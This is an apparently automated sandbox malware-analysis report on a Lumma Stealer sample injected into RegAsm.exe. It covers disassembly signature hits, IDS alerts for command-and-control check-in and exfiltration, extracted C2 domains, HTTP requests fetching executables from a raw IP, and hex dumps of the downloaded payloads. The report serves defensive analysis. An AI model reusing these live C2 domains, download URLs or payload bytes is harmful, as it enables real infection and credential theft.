      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx7_2_00418D6F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h7_2_00418D6F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax7_2_0041D570
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esi+10h], ecx7_2_0042B503
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al7_2_0042B503
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 3568C09Bh7_2_00417502
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 3E416E49h7_2_00439D20
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, 00000001h7_2_00418602
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 9ABDB589h7_2_004247C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 9ABDB589h7_2_004247C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], FD743AC4h7_2_00438FC0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4E66B5A3h7_2_004387C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [eax+ebx], 30303030h7_2_00401000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [eax+ebx], 20202020h7_2_00401000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx7_2_0041102F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], cl7_2_0042B0EC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [eax+edi*8], B62B8D10h7_2_004230A6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ecx7_2_0040F0B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]7_2_00428140
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]7_2_00439940
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]7_2_00408960
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push esi7_2_0041F963
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [esi+edi+02h], 0000h7_2_004269E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebp, edx7_2_004269E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+0Ch]7_2_00401277
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]7_2_00407210
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]7_2_00432A10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push eax7_2_004222ED
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h7_2_00436350
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B282C971h7_2_00421379
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [eax], cl7_2_004293B3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx], ax7_2_0043BBB1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [ebp-18h]7_2_0043BBB1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax7_2_00424C70
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebp, word ptr [eax]7_2_0043FCC0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ecx7_2_004194AD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi+eax-01h], 00000030h7_2_004014B3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [esi+eax+000000ACh]7_2_00429C75
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]7_2_00404D50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, edx7_2_00419D70
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ebx], ax7_2_0041C513
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ebx], ax7_2_0041C52A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+44D9AB7Fh]7_2_00423DD0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]7_2_00405DE0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebp, eax7_2_0040A5F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-000000EBh]7_2_00438580
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx7_2_00411DB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push eax7_2_0043B65F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ebp7_2_00423E07
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [esi+edi+02h], 0000h7_2_004266F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebp, edx7_2_004266F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+08h]7_2_004366F7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+7517AB4Fh]7_2_004366F7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h7_2_00420750
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h7_2_00438700
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+08h]7_2_0040FF28
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [eax+ebp*8], B62B8D10h7_2_00426FD0

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2057284 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (knifedxejsu .cyou) : 192.168.11.20:51454 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.11.20:49727 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.11.20:49720 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.11.20:49711 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.11.20:49712 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.11.20:49730 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.11.20:49729 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.11.20:49724 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.11.20:49725 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.11.20:49728 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 147.45.44.131:80 -> 192.168.11.20:49710
      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49712 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49711 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49712 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49711 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.11.20:49729 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49730 -> 104.21.19.177:443
      Source: Malware configuration extractorURLs: conceszustyb.shop
      Source: Malware configuration extractorURLs: moutheventushz.shop
      Source: Malware configuration extractorURLs: respectabosiz.shop
      Source: Malware configuration extractorURLs: worddosofrm.shop
      Source: Malware configuration extractorURLs: mutterissuen.shop
      Source: Malware configuration extractorURLs: nightybinybz.shop
      Source: Malware configuration extractorURLs: bakedstusteeb.shop
      Source: Malware configuration extractorURLs: standartedby.shop
      Source: Malware configuration extractorURLs: knifedxejsu.cyou
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 07 Nov 2024 16:55:11 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 06 Nov 2024 18:13:46 GMTETag: "b000-626427a8e8d36"Accept-Ranges: bytesContent-Length: 45056Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 11 3e 9d 93 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 0a 00 00 00 00 00 00 6a c3 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 c3 00 00 4f 00 00 00 00 e0 00 00 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 fc c2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 a3 00 00 00 20 00 00 00 a4 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 06 00 00 00 e0 00 00 00 08 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c c3 00 00 00 00 00 00 48 00 00 00 02 00 05 00 94 22 00 00 68 a0 00 00 03 00 02 00 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 53 00 00 00 01 00 00 11 28 0f 00 00 0a 72 01 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0a 28 0f 00 00 0a 72 33 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0b 73 12 00 00 0a 25 6f 13 00 00 0a 06 07 6f 14 00 00 0a 7e 01 00 00 04 6f 15 00 00 0a 0c 7e 02 00 00 04 08 28 03 00 00 06 2a 1e 02 28 16 00 00 0a 2a 00 13 30 06 00 df 00 00 00 02 00 00 11 28 0f 00 00 0a 72 0e 01 00 70 28 10 00 00 0a 6f 11 00 00 0a 28 10 00 00 0a 7e 03 00 00 04 28 05 00 00 06 0a 28 0f 00 00 0a 06 6f 11 00 00 0a 0b 73 17 00 00 0a 73 18 00 00 0a 0c 08 6f 19 00 00 0a 28 0f 00 00 0a 72 0b 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 6f 19 00 00 0a 28 0f 00 00 0a 72 2d 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 17 6f 1b 00 00 0a 08 17 8d 19 00 00 01 25 16 07 a2 6f 1c 00 00 0a 6f 1d 00 00 0a 28 0f 00 00 0a 72 57 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1e 00 00 0a 28 0f 00 00 0a 72 71 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1f 00 00 0a 14 18 8d 10 00
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 07 Nov 2024 16:55:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 06 Nov 2024 18:11:21 GMTETag: "4c200-6264271ea9617"Accept-Ranges: bytesContent-Length: 311808Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 91 33 25 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 f8 03 00 00 c6 00 00 00 00 00 00 00 d4 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 30 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 05 00 3c 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 31 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a f6 03 00 00 10 00 00 00 f8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5d 25 00 00 00 10 04 00 00 26 00 00 00 fc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 70 f0 00 00 00 40 04 00 00 5e 00 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 3c 41 00 00 00 40 05 00 00 42 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: GET /infopage/hdt.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
      Source: global trafficHTTP traffic detected: GET /infopage/tbg9.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
      Source: Joe Sandbox ViewIP Address: 147.45.44.131 147.45.44.131
      Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
      Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49727 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49711 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49712 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49730 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49720 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49729 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49724 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49725 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49728 -> 104.21.19.177:443
      Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.11.20:49710 -> 147.45.44.131:80
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
      Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
      Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
      Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
